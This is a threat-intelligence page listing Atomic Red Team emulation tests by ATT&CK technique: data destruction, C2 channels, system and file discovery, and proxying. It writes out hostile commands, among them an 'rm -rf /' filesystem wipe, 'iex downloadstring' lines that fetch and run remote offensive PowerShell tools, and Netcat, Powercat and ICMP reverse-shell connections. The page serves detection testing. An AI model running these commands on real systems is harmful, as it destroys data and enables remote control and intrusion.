command_promptwindowsDelete a single file - Windows cmd

del /f #{file_to_delete}

command_promptwindowsDelete an entire folder - Windows cmd

rmdir /s /q #{folder_to_delete}

powershellwindowsDelete a single file - Windows PowerShell

Remove-Item -path #{file_to_delete}

powershellwindowsDelete an entire folder - Windows PowerShell

Remove-Item -Path #{folder_to_delete} -Recurse

shlinuxDelete Filesystem - Linux

[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null

powershellelevatedwindowsDelete Prefetch File

Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])

powershellwindowsDelete TeamViewer Log Files

New-Item -Path #{teamviewer_log_file} -Force | Out-Null
Remove-Item #{teamviewer_log_file} -Force -ErrorAction Ignore

command_promptelevatedwindowsClears Recycle bin via rd

rd /s /q %systemdrive%\$RECYCLE.BIN

T1071 Application Layer Protocol · 1 test

powershellwindowsTelnet C2

#{client_path} #{server_ip} --port #{server_port}

T1071.001 Web Protocols · 3 tests

powershellwindowsMalicious User Agents - Powershell

Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null

command_promptwindowsMalicious User Agents - CMD

#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "*<|>*" -m3 #{domain} >nul 2>&1

shlinux, macosMalicious User Agents - Nix

curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}

T1082 System Information Discovery · 25 tests

command_promptwindowsSystem Information Discovery

systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

shmacosSystem Information Discovery

system_profiler
ls -al /Applications

shlinux, macosList OS Information

uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi   
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/null

bashelevatedlinuxLinux VM Check via Hardware

if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi
if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi

bashelevatedlinuxLinux VM Check via Kernel Modules

sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"

shlinuxFreeBSD VM Check via Kernel Modules

kldstat | grep -i "vmm"
kldstat | grep -i "vbox"

command_promptwindowsHostname Discovery (Windows)

hostname

shlinux, macosHostname Discovery

hostname

command_promptwindowsWindows MachineGUID Discovery

REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid

powershellwindowsGriffon Recon

cscript "#{vbscript}"

command_promptwindowsEnvironment variables discovery on windows

set

shlinux, macosEnvironment variables discovery on freebsd, macos and linux

env

shmacosShow System Integrity Protection status (MacOS)

csrutil status

powershellwindowsWinPwn - winPEAS

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput

powershellwindowsWinPwn - itm4nprivesc

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput

powershellwindowsWinPwn - Powersploits privesc checks

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput

powershellwindowsWinPwn - General privesc checks

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput

powershellwindowsWinPwn - GeneralRecon

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive

powershellwindowsWinPwn - Morerecon

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput

powershellwindowsWinPwn - RBCD-Check

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive

powershellwindowsWinPwn - PowerSharpPack - Watson searching for missing windows patches

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watson

powershellwindowsWinPwn - PowerSharpPack - Sharpup checking common Privesc vectors

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"

powershellwindowsWinPwn - PowerSharpPack - Seatbelt

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"

powershellelevatedazure-adAzure Security Scan with SkyArk

Import-Module "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" -force      
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzAccount -Credential $Credential
Connect-AzureAD -Credential $Credential
Scan-AzureAdmins -UseCurrentCred

shlinuxLinux List Kernel Modules

lsmod
kmod list
grep vmw /proc/modules

T1083 File and Directory Discovery · 9 tests

command_promptwindowsFile and Directory Discovery (cmd.exe)

dir /s c:\ >> #{output_file}
dir /s "c:\Documents and Settings" >> #{output_file}
dir /s "c:\Program Files\" >> #{output_file}
dir "%systemdrive%\Users\*.*" >> #{output_file}
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> #{output_file}
dir "%userprofile%\Desktop\*.*" >> #{output_file}
tree /F >> #{output_file}

powershellwindowsFile and Directory Discovery (PowerShell)

ls -recurse
get-childitem -recurse
gci -recurse

shlinux, macosNix File and Directory Discovery

ls -a >> #{output_file}
if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
file */* *>> #{output_file}
cat #{output_file} 2>/dev/null
find . -type f
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
locate *
which sh

shlinux, macosNix File and Directory Discovery 2

cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
cat #{output_file}
find . -type f -name ".*"

powershellwindowsSimulating MAZE Directory Enumeration

$folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
$UsersFolder = "$env:homedrive\Users\"
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
{
foreach ($secondarydirectory in $folderarray)
 {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
}
cat #{File_to_output}

powershellwindowsLaunch DirLister Executable

Start-Process "#{dirlister_path}"
Start-Sleep -Second 4
Stop-Process -Name "DirLister"

command_promptwindowsESXi - Enumerate VMDKs available on an ESXi Host

echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"

shlinuxIdentifying Network Shares - Linux

findmnt -t nfs

powershellwindowsRecursive Enumerate Files And Directories By Powershell

$out = "#{output_file}"
$dirsFilter = @('Documents','Downloads','Desktop','OneDrive')
$exts = @('.pdf','.doc','.docx','.xls','.xlsx','.txt','.zip','.rar','.7z')
$userProfile = [Environment]::GetFolderPath('UserProfile')
$tr = [System.Collections.Generic.List[string]]::new()

function MatchesExtension($path) {
  try {
    $e = [System.IO.Path]::GetExtension($path).ToLower()
    return $exts -contains $e
  } catch { return $false }
}

function Scan-Dir($root) {
  try {
    $match = $false
    foreach ($f in $dirsFilter) { if ($root -like "*$f*") { $match = $true; break } }
    if (-not $match) { return }

    [System.IO.Directory]::EnumerateFiles($root) | ForEach-Object {
      if (MatchesExtension $_) {
        $fi = [System.IO.FileInfo]::new($_)
        $tr.Add("[File] $_ Size:$($fi.Length) LastWrite:$($fi.LastWriteTime)")
      }
    }

    [System.IO.Directory]::EnumerateDirectories($root) | ForEach-Object {
      Scan-Dir $_
    }
  } catch [System.UnauthorizedAccessException] {
    $tr.Add("[AccessDenied] $root")
  } catch {
    $tr.Add("[Error] $root => $($_.Exception.Message)")
  }
}

[System.IO.Directory]::EnumerateDirectories($userProfile) | ForEach-Object { Scan-Dir $_ }

# Ensure output dir exists
$outDir = [System.IO.Path]::GetDirectoryName($out)
if (-not [string]::IsNullOrEmpty($outDir) -and -not (Test-Path $outDir)) {
  New-Item -Path $outDir -ItemType Directory -Force | Out-Null
}

# Write results
$tr | Out-File -FilePath $out -Encoding UTF8
Write-Output "Enumeration complete. Results written to: $out"

T1090.001 Internal Proxy · 3 tests

shlinux, macosConnection Proxy

export #{proxy_scheme}_proxy=#{proxy_server}:#{proxy_port}
curl #{test_url}

shmacosConnection Proxy for macOS UI

networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}

powershellelevatedwindowsportproxy reg key

netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}

T1095 Non-Application Layer Protocol · 4 tests

powershellwindowsICMP C2

IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}

powershellwindowsNetcat C2

cmd /c "#{ncat_exe}" #{server_ip} #{server_port}

powershellwindowsPowercat C2

IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}

manuallinuxLinux ICMP Reverse Shell using icmp-cnc

▶

Tools Used

0 mapped

Other tooling / TTPs (curation, not ATT&CK-mapped):

SPECIALLY CREATED RANSOMWARE FOR BELARUSIAN RAILWAYS JANUARY 2022

Intelligence Graph · click any node to traverse

CVETechnique ActorTool Family

drag to reposition · click any node to traverse · button top-right enlarges

External lookups - second-class, for what we don’t hold ourselves

MITRE search Malpedia Google

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin